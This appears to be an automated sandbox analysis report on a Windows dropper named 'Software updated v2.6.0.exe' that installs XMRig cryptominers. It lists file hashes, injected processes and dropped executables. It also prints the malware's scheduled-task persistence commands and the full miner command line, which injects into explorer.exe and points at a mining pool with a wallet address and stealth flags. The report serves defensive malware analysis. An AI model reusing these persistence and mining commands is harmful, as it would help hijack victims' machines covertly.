Analysis
max time kernel: 137s
max time network: 129s
platform: windows10_x64
resource: win10v20210408
submitted: 19-07-2021 00:03

Static task: static1
Behavioral task: behavioral1
Sample: Software updated v2.6.0.exe
Resource: win7v20210410

General
Target: Software updated v2.6.0.exe
Size: 256KB
MD5: 18d05e20731583a22b495d0d1f107c5b
SHA1: 2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512: 36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
XMRig Miner Payload (3 IoCs)
Processes:
resource                                                                      yara_rule
behavioral2/memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig
behavioral2/memory/2112-167-0x00000001402EB66C-mapping.dmp                    xmrig
behavioral2/memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig

Executes dropped EXE (6 IoCs)
Processes:
pid   process
3860  xmrmine.exe
3928  etcmin.exe
3884  rtksmbs.exe
4028  serverpatch.exe
3472  sihost64.exe
3356  sihost32.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Suspicious use of SetThreadContext (1 IoCs)
Processes:
description                           pid   process          target process
PID 4028 set thread context of 2112   4028  serverpatch.exe  explorer.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid   process
2688  schtasks.exe
3544  schtasks.exe
688   schtasks.exe
4076  schtasks.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
pid   process
3928  etcmin.exe
3860  xmrmine.exe
4028  serverpatch.exe
3884  rtksmbs.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
description                   pid   process
Token: SeDebugPrivilege       3860  xmrmine.exe
Token: SeDebugPrivilege       3928  etcmin.exe
Token: SeDebugPrivilege       4028  serverpatch.exe
Token: SeDebugPrivilege       3884  rtksmbs.exe
Token: SeLockMemoryPrivilege  2112  explorer.exe
Token: SeLockMemoryPrivilege  2112  explorer.exe

Suspicious use of WriteProcessMemory (43 IoCs)
Processes:
description                        pid   process                      target process
PID 992 wrote to memory of 3860    992   Software updated v2.6.0.exe  xmrmine.exe
PID 992 wrote to memory of 3860    992   Software updated v2.6.0.exe  xmrmine.exe
PID 992 wrote to memory of 3928    992   Software updated v2.6.0.exe  etcmin.exe
PID 992 wrote to memory of 3928    992   Software updated v2.6.0.exe  etcmin.exe
PID 3860 wrote to memory of 2052   3860  xmrmine.exe                  cmd.exe
PID 3860 wrote to memory of 2052   3860  xmrmine.exe                  cmd.exe
PID 3928 wrote to memory of 576    3928  etcmin.exe                   cmd.exe
PID 3928 wrote to memory of 576    3928  etcmin.exe                   cmd.exe
PID 2052 wrote to memory of 4076   2052  cmd.exe                      schtasks.exe
PID 2052 wrote to memory of 4076   2052  cmd.exe                      schtasks.exe
PID 576 wrote to memory of 2688    576   cmd.exe                      schtasks.exe
PID 576 wrote to memory of 2688    576   cmd.exe                      schtasks.exe
PID 3860 wrote to memory of 4028   3860  xmrmine.exe                  serverpatch.exe
PID 3860 wrote to memory of 4028   3860  xmrmine.exe                  serverpatch.exe
PID 3928 wrote to memory of 3884   3928  etcmin.exe                   rtksmbs.exe
PID 3928 wrote to memory of 3884   3928  etcmin.exe                   rtksmbs.exe
PID 4028 wrote to memory of 2164   4028  serverpatch.exe              cmd.exe
PID 4028 wrote to memory of 2164   4028  serverpatch.exe              cmd.exe
PID 3884 wrote to memory of 1532   3884  rtksmbs.exe                  cmd.exe
PID 3884 wrote to memory of 1532   3884  rtksmbs.exe                  cmd.exe
PID 4028 wrote to memory of 3472   4028  serverpatch.exe              sihost64.exe
PID 4028 wrote to memory of 3472   4028  serverpatch.exe              sihost64.exe
PID 3884 wrote to memory of 3356   3884  rtksmbs.exe                  sihost32.exe
PID 3884 wrote to memory of 3356   3884  rtksmbs.exe                  sihost32.exe
PID 2164 wrote to memory of 688    2164  cmd.exe                      schtasks.exe
PID 2164 wrote to memory of 688    2164  cmd.exe                      schtasks.exe
PID 1532 wrote to memory of 3544   1532  cmd.exe                      schtasks.exe
PID 1532 wrote to memory of 3544   1532  cmd.exe                      schtasks.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
PID 4028 wrote to memory of 2112   4028  serverpatch.exe              explorer.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
    "C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Roaming\xmrmine.exe
      C:\Users\Admin\AppData\Roaming\xmrmine.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
          - Creates scheduled task(s)
    [3] C:\Users\Admin\appdata\roaming\serverpatch.exe
        "C:\Users\Admin\appdata\roaming\serverpatch.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
            - Creates scheduled task(s)
      [4] C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
          "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
          - Executes dropped EXE
      [4] C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
          - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Roaming\etcmin.exe
      C:\Users\Admin\AppData\Roaming\etcmin.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
          - Creates scheduled task(s)
    [3] C:\Users\Admin\appdata\roaming\rtksmbs.exe
        "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
            - Creates scheduled task(s)
      [4] C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
          "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
          - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
- C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
- C:\Users\Admin\AppData\Roaming\etcmin.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
- C:\Users\Admin\AppData\Roaming\rtksmbs.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
- C:\Users\Admin\AppData\Roaming\serverpatch.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
- C:\Users\Admin\AppData\Roaming\xmrmine.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
- C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
- C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
- C:\Users\Admin\appdata\roaming\rtksmbs.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
- C:\Users\Admin\appdata\roaming\serverpatch.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
- memory/576-129-0x0000000000000000-mapping.dmp
- memory/688-164-0x0000000000000000-mapping.dmp
- memory/1532-149-0x0000000000000000-mapping.dmp
- memory/2052-128-0x0000000000000000-mapping.dmp
- memory/2112-173-0x0000000014C40000-0x0000000014C60000-memory.dmp (Filesize: 128KB)
- memory/2112-172-0x0000000014790000-0x00000000147B0000-memory.dmp (Filesize: 128KB)
- memory/2112-169-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
- memory/2112-168-0x0000000001340000-0x0000000001360000-memory.dmp (Filesize: 128KB)
- memory/2112-167-0x00000001402EB66C-mapping.dmp
- memory/2112-166-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize: 7.3MB)
- memory/2112-174-0x00000000149B0000-0x00000000149D0000-memory.dmp (Filesize: 128KB)
- memory/2112-175-0x00000000149D0000-0x00000000149F0000-memory.dmp (Filesize: 128KB)
- memory/2164-148-0x0000000000000000-mapping.dmp
- memory/2688-131-0x0000000000000000-mapping.dmp
- memory/3356-151-0x0000000000000000-mapping.dmp
- memory/3356-163-0x000000001BA60000-0x000000001BA62000-memory.dmp (Filesize: 8KB)
- memory/3356-158-0x0000000000030000-0x0000000000031000-memory.dmp (Filesize: 4KB)
- memory/3472-162-0x000000001C310000-0x000000001C312000-memory.dmp (Filesize: 8KB)
- memory/3472-150-0x0000000000000000-mapping.dmp
- memory/3472-154-0x00000000006F0000-0x00000000006F1000-memory.dmp (Filesize: 4KB)
- memory/3544-165-0x0000000000000000-mapping.dmp
- memory/3860-118-0x0000000000080000-0x0000000000081000-memory.dmp (Filesize: 4KB)
- memory/3860-132-0x000000001C350000-0x000000001C352000-memory.dmp (Filesize: 8KB)
- memory/3860-125-0x00000000009A0000-0x00000000009A9000-memory.dmp (Filesize: 36KB)
- memory/3860-114-0x0000000000000000-mapping.dmp
- memory/3884-160-0x000000001C4B0000-0x000000001C4B2000-memory.dmp (Filesize: 8KB)
- memory/3884-135-0x0000000000000000-mapping.dmp
- memory/3928-126-0x00000000011A0000-0x00000000011A1000-memory.dmp (Filesize: 4KB)
- memory/3928-124-0x00000000010E0000-0x00000000010E6000-memory.dmp (Filesize: 24KB)
- memory/3928-122-0x00000000007C0000-0x00000000007C1000-memory.dmp (Filesize: 4KB)
- memory/3928-117-0x0000000000000000-mapping.dmp
- memory/3928-133-0x00000000011D0000-0x00000000011D2000-memory.dmp (Filesize: 8KB)
- memory/4028-134-0x0000000000000000-mapping.dmp
- memory/4028-161-0x000000001D3A0000-0x000000001D3A2000-memory.dmp (Filesize: 8KB)
- memory/4076-130-0x0000000000000000-mapping.dmp